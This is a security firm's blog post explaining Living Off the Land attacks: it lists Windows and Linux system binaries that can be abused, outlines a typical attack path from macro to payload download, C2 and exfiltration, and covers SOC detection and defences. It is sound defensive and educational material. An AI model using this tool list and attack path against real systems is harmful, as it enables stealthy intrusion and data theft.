Door op ‘Alle cookies accepteren’ te klikken, gaat u akkoord met het opslaan van cookies op uw apparaat om de sitenavigatie te verbeteren, het sitegebruik te analyseren en te helpen bij onze marketinginspanningen. Bekijk ons privacyverklaring voor meer informatie.
VoorkeurenNeeAccepteer
Pentesting - Living of the land:
April 30, 2025
READING TIME
7
MINUTen

Pentesting - Living of the land:

At DeepBlue Security & Intelligence, performing penetration tests is one of our core specialties, something we do on a daily basis. Our experienced specialists apply an extensive range of established and new techniques to simulate real-life attacks without being detected. Often successfully: we regularly ask our clients whether they noticed anything unusual during our testing, and more often than not, the answer is no.

A standard technique in our cybersecurity domain is the use of existing, legitimate system tools to conduct attacks. This approach, known as "Living Off the Land" (LotL), is a common method in both red teaming and advanced penetration tests. LotL leverages tools that are natively present in operating systems, making detection by antivirus and endpoint protection much more difficult.

What is Living Off the Land?

Living Off the Land (LotL) is an attack technique in which an attacker or pentester uses already present, trusted system tools to carry out malicious actions. Instead of relying on external malware or exploits, standard components like command-line utilities, system binaries, and scripts are used to gain access, move laterally, or exfiltrate data. Because these tools are part of the operating system, they often evade traditional detection and prevention mechanisms.

These tools are often referred to as LOLBins (Living Off the Land Binaries), and the concept extends to LOLScripts(e.g., default PowerShell scripts) and LOLLibs (e.g., DLLs that can be abused). Using these existing and trusted tools enables attackers or pentesters to remain under the radar.

Commonly Used LOLBins:

  • certutil.exe (Windows): Can download files over HTTP(S) and decode base64.
  • powershell.exe: A scripting tool with direct access to the .NET framework, often used for payload execution.
  • wmic.exe: Gathers system information and allows for remote command execution.
  • rundll32.exe: Executes DLLs, including malicious ones.
  • bash/curl/wget (Linux): Used to retrieve payloads or run shell commands via the internet.

Why is this technique effective?

Because these tools are standard and used legitimately in IT management, they are often trusted by antivirus software, EDR platforms, and network monitoring systems. This makes detection challenging. Additionally, LotL techniques are easy to automate and can be combined with other methods such as credential dumping or privilege escalation.

A Typical Attack Path:

  1. Initial Access: A user opens a malicious macro that triggers PowerShell.
  2. Payload Retrieval: PowerShell or certutil is used to download a secondary payload.
  3. Command & Control: A connection to a C2 server is established using PowerShell.
  4. Lateral Movement: WMIC or PsExec is used to run commands on other systems.
  5. Exfiltration: Data is encrypted and sent to an external server using curl or PowerShell.

The Role of a SOC in Detecting LotL Techniques

A well configured Security Operations Center (SOC) plays a crucial role in detecting LotL-based attacks. Because these techniques rely on legitimate system processes, traditional signature-based detection is often insufficient. A SOC uses behavioral analytics, threat hunting, and advanced log correlation to identify anomalies.

Examples of SOC capabilities that support LotL detection:

  • Use-case-based detection: Detect unusual usage of tools like rundll32.exe or certutil.exe.
  • Threat intelligence integration: SOCs map behavior to known TTPs (Tactics, Techniques & Procedures) from frameworks like MITRE ATT&CK.
  • Automated alerting via SIEM/EDR: Alerts are triggered when system components are misused in abnormal patterns.
  • Retrospective analysis: A SOC can look back through logs to identify past undetected attack activity.

How to Defend Against LotL Attacks

Detecting and mitigating LotL-based attacks requires a behavior-based approach. Recommended measures include:

  • Command line logging and auditing: Use tools like Sysmon (Windows) or AuditD (Linux) to log all commands.
  • AppLocker or Windows Defender Application Control (WDAC): Restrict which binaries can be executed.
  • SIEM analysis: Create rules to detect abnormal use of certutil.exe, powershell.exe, or wmic.exe.
  • EDR tuning: Ensure modern EDR platforms are configured to identify unusual behavior.
  • Least privilege model: Prevent users with standard privileges from managing critical systems.

So?

Living Off the Land is a powerful, stealthy technique that appears in nearly every professional pentest or attack scenario. For organizations, it’s crucial to understand which standard tools are present in their systems, how they’re used, and how deviations from normal behavior can be detected early.

An active, well-tuned SOC using behavioral analytics and log monitoring is one of the most effective ways to detect these techniques in time. By restricting built-in functionality to only what is necessary and systematically investigating anomalies, you can significantly enhance your cyber defense posture.

Want to know if your organization is vulnerable to LotL techniques? Our pentesters at DeepBlue can perform tailored assessments to evaluate this and provide concrete recommendations.
Would you like to know more about this or any of our other customized services? Contact us at info@deepbluesecurity.nl or call us at +31 (0)70 800 2025.

NEDERLANDSE VERSIE
Back to Resources

Ready to start?

When it comes to cyber security, we are your best choice

Contact